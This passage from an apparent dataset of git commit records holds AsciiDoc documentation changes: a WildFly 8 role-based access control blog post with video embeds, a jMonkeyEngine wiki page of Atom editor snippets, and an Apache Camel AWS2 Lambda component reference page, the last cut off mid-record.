the basics of Role Based Access Control, and show how you can use standard roles within the WildFly Administration Console.\n\n{nbsp}\n\n+++\n<iframe class=\"blog-video-frame\" src=\"\/\/player.vimeo.com\/video\/78785944\" frameborder=\"0\" webkitallowfullscreen mozallowfullscreen allowfullscreen><\/iframe> <p><a href=\"http:\/\/vimeo.com\/78785944\">Role Based Access Control in WildFly 8 (Part 2 of 3)<\/a> from <a href=\"http:\/\/vimeo.com\/user22464624\">Brian Stansberry<\/a> on <a href=\"https:\/\/vimeo.com\">Vimeo<\/a>.<\/p>\n+++\n\nIn the second video, I show how you can configure roles and setup users which map to roles. \n\n{nbsp}\n\n+++\n<iframe class=\"blog-video-frame\" src=\"\/\/player.vimeo.com\/video\/78786992\" frameborder=\"0\" webkitallowfullscreen mozallowfullscreen allowfullscreen><\/iframe> <p><a href=\"http:\/\/vimeo.com\/78786992\">Role Based Access Control in WildFly 8 (Part 3 of 3)<\/a> from <a href=\"http:\/\/vimeo.com\/user22464624\">Brian Stansberry<\/a> on <a href=\"https:\/\/vimeo.com\">Vimeo<\/a>.<\/p>\n+++\n\nIn the final video, I show how you can configure constraints which allow you to tweak the behavior of roles.\n","old_contents":"= Role Based Access Control in WildFly 8\nbstansberry\n2013-11-07\n:revdate: 2013-11-07 12:39:25 -0600\n:awestruct-tags: [management, rbac, wildfly8, videos]\n:awestruct-layout: blog\n:source-highlighter: coderay\n\nOne of the big new features in WildFly 8 is the ability to enforce role based access control on managmeent operations. I recorded some videos that describe how you can use this powerful feature, and also demonstrate it in action. Check them out!\n\n{nbsp}\n\n+++\n<iframe class=\"blog-video-frame\" src=\"\/\/player.vimeo.com\/video\/78780176\" frameborder=\"0\" webkitallowfullscreen mozallowfullscreen allowfullscreen><\/iframe> <p><a href=\"http:\/\/vimeo.com\/78780176\">Role Based Access Control in WildFly 8 (Part 1 of 3)<\/a> from <a href=\"http:\/\/vimeo.com\/user22464624\">Brian Stansberry<\/a> on <a href=\"https:\/\/vimeo.com\">Vimeo<\/a>.<\/p>\n+++\n\nIn the first part of the series I walk through the basics of Role Based Access Control, and show how you can use standard roles within the WildFly Administration Console.\n\n{nbsp}\n\n+++\n<iframe class=\"blog-video-frame\" src=\"\/\/player.vimeo.com\/video\/78785944\" frameborder=\"0\" webkitallowfullscreen mozallowfullscreen allowfullscreen><\/iframe> <p><a href=\"http:\/\/vimeo.com\/78785944\">Role Based Access Control in WildFly 8 (Part 2 of 3)<\/a> from <a href=\"http:\/\/vimeo.com\/user22464624\">Brian Stansberry<\/a> on <a href=\"https:\/\/vimeo.com\">Vimeo<\/a>.<\/p>\n+++\n\nIn the second video I show how you can configure roles and setup users which map to roles. \n\n{nbsp}\n\n+++\n<iframe class=\"blog-video-frame\" src=\"\/\/player.vimeo.com\/video\/78786992\" frameborder=\"0\" webkitallowfullscreen mozallowfullscreen allowfullscreen><\/iframe> <p><a href=\"http:\/\/vimeo.com\/78786992\">Role Based Access Control in WildFly 8 (Part 3 of 3)<\/a> from <a href=\"http:\/\/vimeo.com\/user22464624\">Brian Stansberry<\/a> on <a href=\"https:\/\/vimeo.com\">Vimeo<\/a>.<\/p>\n+++\n\nIn the final video I show how you can configure constraints which allow you to tweak the behavior of roles.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"416ffb582932f8b51979b2e3c6f457a7952cd314","subject":"Fixed broken kbd syntax.","message":"Fixed broken kbd syntax.\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/wiki\/atom_snippets.adoc","new_file":"src\/docs\/asciidoc\/wiki\/atom_snippets.adoc","new_contents":"= Atom Snippets Page\n:author: mitm\n:revnumber:\n:revdate: 2017-09-08T23:24:11.262Z\n:relfileprefix: ..\/\n:imagesdir: ..\n:experimental:\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\nEdit this file to add snippets to the snippets.cson file for the\nlink:https:\/\/atom.io\/[Atom editor]. To use these snippets just copy and paste\nthe text below into your snippets.cson file.\n\n[source]\n----\n# Your snippets\n#\n# Atom snippets allow you to enter a simple prefix in the editor and hit tab to\n# expand the prefix into a larger code block with templated values.\n#\n# You can create a new snippet in this file by typing \"snip\" and then hitting\n# tab.\n#\n# An example CoffeeScript snippet to expand log to console.log:\n#\n# '.source.coffee':\n# 'Console log':\n# 'prefix': 'log'\n# 'body': 'console.log $1'\n#\n# Each scope (e.g. '.source.coffee' above) can only be declared once.\n#\n# This file uses CoffeeScript Object Notation (CSON).\n# If you are unfamiliar with CSON, you can read more about it in the\n# Atom Flight Manual:\n# http:\/\/flight-manual.atom.io\/using-atom\/sections\/basic-customization\/#_cson\n'.source.asciidoc':\n 'Inter-Doc Cross Reference':\n 'prefix': 'xref'\n 'body': '<<${1:path\/to\/wiki\/page}#,${2:custom label text}>>'\n 'Admonition Block':\n 'prefix': 'admonB'\n 'body': \"\"\"\n [${1:NOTE}${2:TIP}${3:IMPORTANT}${4:CAUTION}${5:WARNING}]\n ====\n $6\n ====\n $7\n \"\"\"\n 'Admonition Block with Title':\n 'prefix': 'admonBwT'\n 'body': \"\"\"\n [${1:NOTE}${2:TIP}${3:IMPORTANT}${4:CAUTION}${5:WARNING}]\n .${6:Optional Title}\n ====\n $7\n ====\n $8\n \"\"\"\n 'Admonition Paragraph':\n 'prefix': 'admonP'\n 'body': \"\"\"\n ${1:NOTE}${2:TIP}${3:IMPORTANT}${4:CAUTION}${5:WARNING}: $6\n \"\"\"\n 'Admonition Paragraph with Title':\n 'prefix': 'admonPwT'\n 'body': \"\"\"\n .${1:Optional Title}\n ${2:NOTE}${3:TIP}${4:IMPORTANT}${5:CAUTION}${6:WARNING}: $7\n \"\"\"\n----\n\n== Snippets Explained\n\n[cols=\"10, 45,45\"*,options=\"header\"]\n|===\n\n| Prefix\n| Inserted Syntax\n| Description\n\n| xref\n|`+<<path\/to\/wiki\/page#,custom label text>>+`\n| Inserts an `Inter-Document Cross Reference`.\n\n| admonB\n| [NOTETIPIMPORTANTCAUTIONWARNING] +\n ==== +\n ====\n| Inserts an `Admonition Block` with the #NOTE# style highlighted. Use the kbd:[Tab] key to cycle to the next style\nand kbd:[Backspace] off any unwanted style as you go. The final kbd:[Tab] will take you into the block.\n\n| admonBwT\n| [NOTETIPIMPORTANTCAUTIONWARNING] +\n.Optional Title +\n ==== +\n ====\n| Inserts an `Admonition Block` with title.\n\n\n| admonP\n| NOTETIPIMPORTANTCAUTIONWARNING:\n| Inserts an `Admonition Paragraph` with the #NOTE# style highlighted. Use the kbd:[Tab] key to cycle to the next style\nand kbd:[Backspace] off any unwanted style as you go. The final kbd:[Tab] will take you to the begining of the paragraph.\n\n| admonPwT\n| .Optional Title +\nNOTETIPIMPORTANTCAUTIONWARNING:\n| Inserts an `Admonition Paragraph` with title.\n\n|===\n","old_contents":"= Atom Snippets Page\n:author: mitm\n:revnumber:\n:revdate: 2017-09-08T23:24:11.262Z\n:relfileprefix: ..\/\n:imagesdir: ..\n:experimental:\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\nEdit this file to add snippets to the snippets.cson file for the\nlink:https:\/\/atom.io\/[Atom editor]. To use these snippets just copy and paste\nthe text below into your snippets.cson file.\n\n[source]\n----\n# Your snippets\n#\n# Atom snippets allow you to enter a simple prefix in the editor and hit tab to\n# expand the prefix into a larger code block with templated values.\n#\n# You can create a new snippet in this file by typing \"snip\" and then hitting\n# tab.\n#\n# An example CoffeeScript snippet to expand log to console.log:\n#\n# '.source.coffee':\n# 'Console log':\n# 'prefix': 'log'\n# 'body': 'console.log $1'\n#\n# Each scope (e.g. '.source.coffee' above) can only be declared once.\n#\n# This file uses CoffeeScript Object Notation (CSON).\n# If you are unfamiliar with CSON, you can read more about it in the\n# Atom Flight Manual:\n# http:\/\/flight-manual.atom.io\/using-atom\/sections\/basic-customization\/#_cson\n'.source.asciidoc':\n 'Inter-Doc Cross Reference':\n 'prefix': 'xref'\n 'body': '<<${1:path\/to\/wiki\/page}#,${2:custom label text}>>'\n 'Admonition Block':\n 'prefix': 'admonB'\n 'body': \"\"\"\n [${1:NOTE}${2:TIP}${3:IMPORTANT}${4:CAUTION}${5:WARNING}]\n ====\n $6\n ====\n $7\n \"\"\"\n 'Admonition Block with Title':\n 'prefix': 'admonBwT'\n 'body': \"\"\"\n [${1:NOTE}${2:TIP}${3:IMPORTANT}${4:CAUTION}${5:WARNING}]\n .${6:Optional Title}\n ====\n $7\n ====\n $8\n \"\"\"\n 'Admonition Paragraph':\n 'prefix': 'admonP'\n 'body': \"\"\"\n ${1:NOTE}${2:TIP}${3:IMPORTANT}${4:CAUTION}${5:WARNING}: $6\n \"\"\"\n 'Admonition Paragraph with Title':\n 'prefix': 'admonPwT'\n 'body': \"\"\"\n .${1:Optional Title}\n ${2:NOTE}${3:TIP}${4:IMPORTANT}${5:CAUTION}${6:WARNING}: $7\n \"\"\"\n----\n\n== Snippets Explained\n\n[cols=\"10, 45,45\"*,options=\"header\"]\n|===\n\n| Prefix\n| Inserted Syntax\n| Description\n\n| xref\n|`+<<path\/to\/wiki\/page#,custom label text>>+`\n| Inserts an `Inter-Document Cross Reference`.\n\n| admonB\n| [NOTETIPIMPORTANTCAUTIONWARNING] +\n ==== +\n ====\n| Inserts an `Admonition Block` with the #NOTE# style highlighted. Use the kbd:[Tab] key to cycle to the next style\nand kbd:[Backspace] off any unwanted style as you go. The final kbd:[Tab] will take you into the block.\n\n| admonBwT\n| [NOTETIPIMPORTANTCAUTIONWARNING] +\n.Optional Title +\n ==== +\n ====\n| Inserts an `Admonition Block` with title.\n\n\n| admonP\n| NOTETIPIMPORTANTCAUTIONWARNING:\n| Inserts an `Admonition Paragraph` with the #NOTE# style highlighted. Use the kbd:[Tab] key to cycle to the next style\nand kbd:[Backspace] off any unwanted style as you go. The final kdd:[Tab] will take you to the begining of the paragraph.\n\n| admonPwT\n| .Optional Title +\nNOTETIPIMPORTANTCAUTIONWARNING:\n| Inserts an `Admonition Paragraph` with title.\n\n|===\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"5dd5585160611ee9df03ad6f7c9bac2b1c446868","subject":"Regen docs","message":"Regen docs\n","repos":"mcollovati\/camel,nicolaferraro\/camel,adessaigne\/camel,tdiesler\/camel,tdiesler\/camel,tdiesler\/camel,nikhilvibhav\/camel,mcollovati\/camel,tadayosi\/camel,DariusX\/camel,adessaigne\/camel,pax95\/camel,cunningt\/camel,ullgren\/camel,tadayosi\/camel,apache\/camel,tdiesler\/camel,apache\/camel,cunningt\/camel,pax95\/camel,apache\/camel,DariusX\/camel,christophd\/camel,ullgren\/camel,pmoerenhout\/camel,cunningt\/camel,pax95\/camel,christophd\/camel,gnodet\/camel,tadayosi\/camel,christophd\/camel,alvinkwekel\/camel,mcollovati\/camel,pax95\/camel,zregvart\/camel,cunningt\/camel,mcollovati\/camel,zregvart\/camel,alvinkwekel\/camel,adessaigne\/camel,nikhilvibhav\/camel,nicolaferraro\/camel,adessaigne\/camel,gnodet\/camel,cunningt\/camel,DariusX\/camel,adessaigne\/camel,pmoerenhout\/camel,gnodet\/camel,zregvart\/camel,alvinkwekel\/camel,nikhilvibhav\/camel,apache\/camel,christophd\/camel,tdiesler\/camel,adessaigne\/camel,nicolaferraro\/camel,gnodet\/camel,christophd\/camel,tdiesler\/camel,alvinkwekel\/camel,cunningt\/camel,nicolaferraro\/camel,pmoerenhout\/camel,pmoerenhout\/camel,pmoerenhout\/camel,pax95\/camel,DariusX\/camel,ullgren\/camel,tadayosi\/camel,tadayosi\/camel,ullgren\/camel,christophd\/camel,pmoerenhout\/camel,apache\/camel,pax95\/camel,tadayosi\/camel,nikhilvibhav\/camel,gnodet\/camel,zregvart\/camel,apache\/camel","old_file":"docs\/components\/modules\/ROOT\/pages\/aws2-lambda-component.adoc","new_file":"docs\/components\/modules\/ROOT\/pages\/aws2-lambda-component.adoc","new_contents":"[[aws2-lambda-component]]\n= AWS Lambda Component\n:page-source: components\/camel-aws2-lambda\/src\/main\/docs\/aws2-lambda-component.adoc\n\n*Since Camel 3.2*\n\n*Since Camel 3.2*\n\n\n\/\/ HEADER START\n*Only producer is supported*\n\/\/ HEADER END\n\nThe Lambda component supports create, get, list, delete and invoke\nhttps:\/\/aws.amazon.com\/lambda\/[AWS Lambda] functions.\n\n*Prerequisites*\n\nYou must have a valid Amazon Web Services developer account, and be\nsigned up to use Amazon Lambda. More information is available at\nhttps:\/\/aws.amazon.com\/lambda\/[AWS Lambda].\n\nWhen creating a Lambda function, you need to specify a IAM role which has at least the AWSLambdaBasicExecuteRole policy attached.\n\n[NOTE]\n====\nThe AWS2 Lambda component is not supported in OSGI\n====\n\n== URI Format\n\n[source,java]\n-------------------------\naws2-lambda:\/\/functionName[?options]\n-------------------------\n\nYou can append query options to the URI in the following format,\n?options=value&option2=value&...\n\n== URI Options\n\n\n\/\/ component options: START\nThe AWS Lambda component supports 6 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *accessKey* (producer) | Amazon AWS Access Key | | String\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *region* (producer) | Amazon AWS Region | | String\n| *secretKey* (producer) | Amazon AWS Secret Key | | String\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *configuration* (advanced) | The AWS Lambda default configuration | | Lambda2Configuration\n|===\n\/\/ component options: END\n\n\n\n\n\/\/ endpoint options: START\nThe AWS Lambda endpoint is configured using URI syntax:\n\n----\naws2-lambda:function\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *function* | *Required* Name of the Lambda function. | | String\n|===\n\n\n=== Query Parameters (11 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *operation* (producer) | The operation to perform. It can be listFunctions, getFunction, createFunction, deleteFunction or invokeFunction. The value can be one of: listFunctions, getFunction, createAlias, deleteAlias, getAlias, listAliases, createFunction, deleteFunction, invokeFunction, updateFunction, createEventSourceMapping, deleteEventSourceMapping, listEventSourceMapping, listTags, tagResource, untagResource, publishVersion, listVersions | invokeFunction | Lambda2Operations\n| *region* (producer) | Amazon AWS Region. When using this parameter, the configuration will expect the capitalized name of the region (for example AP_EAST_1) You'll need to use the name Regions.EU_WEST_1.name() | | String\n| *awsLambdaClient* (advanced) | To use a existing configured AwsLambdaClient as client | | LambdaClient\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n| *proxyHost* (proxy) | To define a proxy host when instantiating the Lambda client | | String\n| *proxyPort* (proxy) | To define a proxy port when instantiating the Lambda client | | Integer\n| *proxyProtocol* (proxy) | To define a proxy protocol when instantiating the Lambda client. The value can be one of: HTTP, HTTPS | HTTPS | Protocol\n| *accessKey* (security) | Amazon AWS Access Key | | String\n| *secretKey* (security) | Amazon AWS Secret Key | | String\n|===\n\/\/ endpoint options: END\n\n\n\n\nRequired Lambda component options\n\nYou have to provide the awsLambdaClient in the\nRegistry or your accessKey and secretKey to access\nthe https:\/\/aws.amazon.com\/lambda\/[Amazon Lambda] service.\n\n== Usage\n\n=== Message headers evaluated by the Lambda producer\n\n[width=\"100%\",cols=\"5%,5%,10%,75%,5%\",options=\"header\",]\n|=======================================================================\n|Operation |Header |Type |Description |Required\n\n|All |`CamelAwsLambdaOperation` |`String` |The operation we want to perform. Override operation passed as query parameter| Yes\n\n|createFunction |`CamelAwsLambdaS3Bucket` |`String` |Amazon S3 bucket name where the .zip file containing\nyour deployment package is stored. This bucket must reside in the same AWS region where you are creating the Lambda function.| No\n\n|createFunction |`CamelAwsLambdaS3Key` |`String` |The Amazon S3 object (the deployment package) key name\nyou want to upload.| No\n\n|createFunction |`CamelAwsLambdaS3ObjectVersion` |String |The Amazon S3 object (the deployment package) version\nyou want to upload.| No\n\n|createFunction |`CamelAwsLambdaZipFile` |`String` |The local path of the zip file (the deployment package).\n Content of zip file can also be put in Message body.| No\n\n|createFunction |`CamelAwsLambdaRole` |`String` |The Amazon Resource Name (ARN) of the IAM role that Lambda assumes\n when it executes your function to access any other Amazon Web Services (AWS) resources. |Yes\n\n|createFunction |`CamelAwsLambdaRuntime` |String |The runtime environment for the Lambda function you are uploading.\n (nodejs, nodejs4.3, nodejs6.10, java8, python2.7, python3.6, dotnetcore1.0, odejs4.3-edge) |Yes\n\n|createFunction |`CamelAwsLambdaHandler` |`String` |The function within your code that Lambda calls to begin execution.\n For Node.js, it is the module-name.export value in your function.\n For Java, it can be package.class-name::handler or package.class-name.|Yes\n\n|createFunction |`CamelAwsLambdaDescription` |`String` |The user-provided description.|No\n\n|createFunction |`CamelAwsLambdaTargetArn` |`String` |The parent object that contains the target ARN (Amazon Resource Name)\nof an Amazon SQS queue or Amazon SNS topic.|No\n\n|createFunction |`CamelAwsLambdaMemorySize` |`Integer` |The memory size, in MB, you configured for the function.\nMust be a multiple of 64 MB.|No\n\n|createFunction |`CamelAwsLambdaKMSKeyArn` |`String` |The Amazon Resource Name (ARN) of the KMS key used to encrypt your function's environment variables.\nIf not provided, AWS Lambda will use a default service key.|No\n\n|createFunction |`CamelAwsLambdaPublish` |`Boolean` |This boolean parameter can be used to request AWS Lambda\nto create the Lambda function and publish a version as an atomic operation.|No\n\n|createFunction |`CamelAwsLambdaTimeout` |`Integer` |The function execution time at which Lambda should terminate the function.\nThe default is 3 seconds.|No\n\n|createFunction |`CamelAwsLambdaTracingConfig` |`String` |Your function's tracing settings (Active or PassThrough).|No\n\n|createFunction |`CamelAwsLambdaEnvironmentVariables` |`Map<String, String>` |The key-value pairs that represent your environment's configuration settings.|No\n\n|createFunction |`CamelAwsLambdaEnvironmentTags` |`Map<String, String>` |The list of tags (key-value pairs) assigned to the new function.|No\n\n|createFunction |`CamelAwsLambdaSecurityGroupIds` |`List<String>` |If your Lambda function accesses resources in a VPC, a list of one or more security groups IDs in your VPC.|No\n\n|createFunction |`CamelAwsLambdaSubnetIds` |`List<String>` |If your Lambda function accesses resources in a VPC, a list of one or more subnet IDs in your VPC.|No\n\n|createAlias |`CamelAwsLambdaFunctionVersion` |`String` |The function version to set in the alias|Yes\n\n|createAlias |`CamelAwsLambdaAliasFunctionName` |`String` |The function name to set in the alias|Yes\n\n|createAlias |`CamelAwsLambdaAliasFunctionDescription` |`String` |The function description to set in the alias|No\n\n|deleteAlias |`CamelAwsLambdaAliasFunctionName` |`String` |The function name of the alias|Yes\n\n|getAlias |`CamelAwsLambdaAliasFunctionName` |`String` |The function name of the alias|Yes\n\n|listAliases |`CamelAwsLambdaFunctionVersion` |`String` |The function version to set in the alias|Yes\n\n|=======================================================================\n\n== List of Avalaible Operations\n\n- listFunctions\n- getFunction\n- createFunction\n- deleteFunction\n- invokeFunction\n- updateFunction\n- createEventSourceMapping\n- deleteEventSourceMapping\n- listEventSourceMapping\n- listTags\n- tagResource\n- untagResource\n- publishVersion\n- listVersions\n- createAlias\n- deleteAlias\n- getAlias\n- listAliases\n\n== Example\n\nTo have a full understanding of how the component works, you may have a look at this https:\/\/github.com\/apache\/camel\/blob\/master\/components\/camel-aws\/src\/test\/java\/org\/apache\/camel\/component\/aws\/lambda\/integration\/LambdaComponentIntegrationTest.java[integration test]\n\n== Automatic detection of LambdaClient client in registry\n\nThe component is capable of detecting the presence of an LambdaClient bean into the registry.\nIf it's the only instance of that type it will be used as client and you won't have to define it as uri parameter.\nThis may be really useful for smarter configuration of the endpoint.\n\n\n== Dependencies\n\nMaven users will need to add the following dependency to their pom.xml.\n\n*pom.xml*\n\n[source,xml]\n---------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-aws2-lambda<\/artifactId>\n <version>${camel-version}<\/version>\n<\/dependency>\n---------------------------------------\n\nwhere `$\\{camel-version\\}` must be replaced by the actual version of Camel.\n\n\ninclude::camel-spring-boot::page$aws-lambda-starter.adoc[]\n","old_contents":"[[aws2-lambda-component]]\n= AWS Lambda Component\n:page-source: components\/camel-aws2-lambda\/src\/main\/docs\/aws2-lambda-component.adoc\n\n*Since Camel 3.2*\n\n*Since Camel 3.2*\n\n\n\/\/ HEADER START\n*Only producer is supported*\n\/\/ HEADER END\n\nThe Lambda component supports create, get, list, delete and invoke\nhttps:\/\/aws.amazon.com\/lambda\/[AWS Lambda] functions.\n\n*Prerequisites*\n\nYou must have a valid Amazon Web Services developer account, and be\nsigned up to use Amazon Lambda. More information is available at\nhttps:\/\/aws.amazon.com\/lambda\/[AWS Lambda].\n\nWhen creating a Lambda function, you need to specify a IAM role which has at least the AWSLambdaBasicExecuteRole policy attached.\n\n*Warning*\n\nLambda is regional service. Unlike S3 bucket, Lambda function created in a given region is not available on other regions.\n\n== URI Format\n\n[source,java]\n-------------------------\naws2-lambda:\/\/functionName[?options]\n-------------------------\n\nYou can append query options to the URI in the following format,\n?options=value&option2=value&...\n\n== URI Options\n\n\n\/\/ component options: START\nThe AWS Lambda component supports 6 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *accessKey* (producer) | Amazon AWS Access Key | | String\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *region* (producer) | Amazon AWS Region | | String\n| *secretKey* (producer) | Amazon AWS Secret Key | | String\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *configuration* (advanced) | The AWS Lambda default configuration | | Lambda2Configuration\n|===\n\/\/ component options: END\n\n\n\n\n\/\/ endpoint options: START\nThe AWS Lambda endpoint is configured using URI syntax:\n\n----\naws2-lambda:function\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *function* | *Required* Name of the Lambda function. | | String\n|===\n\n\n=== Query Parameters (11 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *operation* (producer) | The operation to perform. It can be listFunctions, getFunction, createFunction, deleteFunction or invokeFunction. The value can be one of: listFunctions, getFunction, createAlias, deleteAlias, getAlias, listAliases, createFunction, deleteFunction, invokeFunction, updateFunction, createEventSourceMapping, deleteEventSourceMapping, listEventSourceMapping, listTags, tagResource, untagResource, publishVersion, listVersions | invokeFunction | Lambda2Operations\n| *region* (producer) | Amazon AWS Region. When using this parameter, the configuration will expect the capitalized name of the region (for example AP_EAST_1) You'll need to use the name Regions.EU_WEST_1.name() | | String\n| *awsLambdaClient* (advanced) | To use a existing configured AwsLambdaClient as client | | LambdaClient\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n| *proxyHost* (proxy) | To define a proxy host when instantiating the Lambda client | | String\n| *proxyPort* (proxy) | To define a proxy port when instantiating the Lambda client | | Integer\n| *proxyProtocol* (proxy) | To define a proxy protocol when instantiating the Lambda client. The value can be one of: HTTP, HTTPS | HTTPS | Protocol\n| *accessKey* (security) | Amazon AWS Access Key | | String\n| *secretKey* (security) | Amazon AWS Secret Key | | String\n|===\n\/\/ endpoint options: END\n\n\n\n\nRequired Lambda component options\n\nYou have to provide the awsLambdaClient in the\nRegistry or your accessKey and secretKey to access\nthe https:\/\/aws.amazon.com\/lambda\/[Amazon Lambda] service.\n\n== Usage\n\n=== Message headers evaluated by the Lambda producer\n\n[width=\"100%\",cols=\"5%,5%,10%,75%,5%\",options=\"header\",]\n|=======================================================================\n|Operation |Header |Type |Description |Required\n\n|All |`CamelAwsLambdaOperation` |`String` |The operation we want to perform. Override operation passed as query parameter| Yes\n\n|createFunction |`CamelAwsLambdaS3Bucket` |`String` |Amazon S3 bucket name where the .zip file containing\nyour deployment package is stored. This bucket must reside in the same AWS region where you are creating the Lambda function.| No\n\n|createFunction |`CamelAwsLambdaS3Key` |`String` |The Amazon S3 object (the deployment package) key name\nyou want to upload.| No\n\n|createFunction |`CamelAwsLambdaS3ObjectVersion` |String |The Amazon S3 object (the deployment package) version\nyou want to upload.| No\n\n|createFunction |`CamelAwsLambdaZipFile` |`String` |The local path of the zip file (the deployment package).\n Content of zip file can also be put in Message body.| No\n\n|createFunction |`CamelAwsLambdaRole` |`String` |The Amazon Resource Name (ARN) of the IAM role that Lambda assumes\n when it executes your function to access any other Amazon Web Services (AWS) resources. |Yes\n\n|createFunction |`CamelAwsLambdaRuntime` |String |The runtime environment for the Lambda function you are uploading.\n (nodejs, nodejs4.3, nodejs6.10, java8, python2.7, python3.6, dotnetcore1.0, odejs4.3-edge) |Yes\n\n|createFunction |`CamelAwsLambdaHandler` |`String` |The function within your code that Lambda calls to begin execution.\n For Node.js, it is the module-name.export value in your function.\n For Java, it can be package.class-name::handler or package.class-name.|Yes\n\n|createFunction |`CamelAwsLambdaDescription` |`String` |The user-provided description.|No\n\n|createFunction |`CamelAwsLambdaTargetArn` |`String` |The parent object that contains the target ARN (Amazon Resource Name)\nof an Amazon SQS queue or Amazon SNS topic.|No\n\n|createFunction |`CamelAwsLambdaMemorySize` |`Integer` |The memory size, in MB, you configured for the function.\nMust be a multiple of 64 MB.|No\n\n|createFunction |`CamelAwsLambdaKMSKeyArn` |`String` |The Amazon Resource Name (ARN) of the KMS key used to encrypt your function's environment variables.\nIf not provided, AWS Lambda will use a default service key.|No\n\n|createFunction |`CamelAwsLambdaPublish` |`Boolean` |This boolean parameter can be used to request AWS Lambda\nto create the Lambda function and publish a version as an atomic operation.|No\n\n|createFunction |`CamelAwsLambdaTimeout` |`Integer` |The function execution time at which Lambda should terminate the function.\nThe default is 3 seconds.|No\n\n|createFunction |`CamelAwsLambdaTracingConfig` |`String` |Your function's tracing settings (Active or PassThrough).|No\n\n|createFunction |`CamelAwsLambdaEnvironmentVariables` |`Map<String, String>` |The key-value pairs that represent your environment's configuration settings.|No\n\n|createFunction |`CamelAwsLambdaEnvironmentTags` |`Map<String, String>` |The list of tags (key-value pairs) assigned to the new function.|No\n\n|createFunction |`CamelAwsLambdaSecurityGroupIds` |`List<String>` |If your Lambda function accesses resources in a VPC, a list of one or more security groups IDs in your VPC.|No\n\n|createFunction |`CamelAwsLambdaSubnetIds` |`List<String>` |If your Lambda function accesses resources in a VPC, a list of one or more subnet IDs in your VPC.|No\n\n|createAlias |`CamelAwsLambdaFunctionVersion` |`String` |The function version to set in the alias|Yes\n\n|createAlias |`CamelAwsLambdaAliasFunctionName` |`String` |The function name to set in the alias|Yes\n\n|createAlias |`CamelAwsLambdaAliasFunctionDescription` |`String` |The function description to set in the alias|No\n\n|deleteAlias |`CamelAwsLambdaAliasFunctionName` |`String` |The function name of the alias|Yes\n\n|getAlias |`CamelAwsLambdaAliasFunctionName` |`String` |The function name of the alias|Yes\n\n|listAliases |`CamelAwsLambdaFunctionVersion` |`String` |The function version to set in the alias|Yes\n\n|=======================================================================\n\n== List of Avalaible Operations\n\n- listFunctions\n- getFunction\n- createFunction\n- deleteFunction\n- invokeFunction\n- updateFunction\n- createEventSourceMapping\n- deleteEventSourceMapping\n- listEventSourceMapping\n- listTags\n- tagResource\n- untagResource\n- publishVersion\n- listVersions\n- createAlias\n- deleteAlias\n- getAlias\n- listAliases\n\n== Example\n\nTo have a full understanding of how the component works, you may have a look at this https:\/\/github.com\/apache\/camel\/blob\/master\/components\/camel-aws\/src\/test\/java\/org\/apache\/camel\/component\/aws\/lambda\/integration\/LambdaComponentIntegrationTest.java[integration test]\n\n== Automatic detection of LambdaClient client in registry\n\nThe component is capable of detecting the presence of an LambdaClient bean into the registry.\nIf it's the only instance of that type it will be used as client and you won't have to define it as uri parameter.\nThis may be really useful for smarter configuration of the endpoint.\n\n\n== Dependencies\n\nMaven users will need to add the following dependency to their 